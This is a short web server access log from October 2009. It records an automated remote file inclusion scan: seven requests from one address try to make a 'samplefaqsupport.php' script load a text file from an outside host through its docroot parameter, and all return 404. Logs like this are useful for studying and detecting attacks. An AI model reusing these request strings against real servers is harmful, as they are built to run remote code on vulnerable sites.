65.98.17.54 - - [17/Oct/2009:01:01:19 -0400] "GET ///faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:01:19 -0400] "GET /logs///faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:01:20 -0400] "GET /logs/access_log.Q109051500%20%20///faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:01:20 -0400] "GET ///faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:01:20 -0400] "GET /logs/access_log.Q109083100%20%20///faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:01:20 -0400] "GET /logs///faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:01:22 -0400] "GET /logs/access_log.Q109051500%20%20///faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
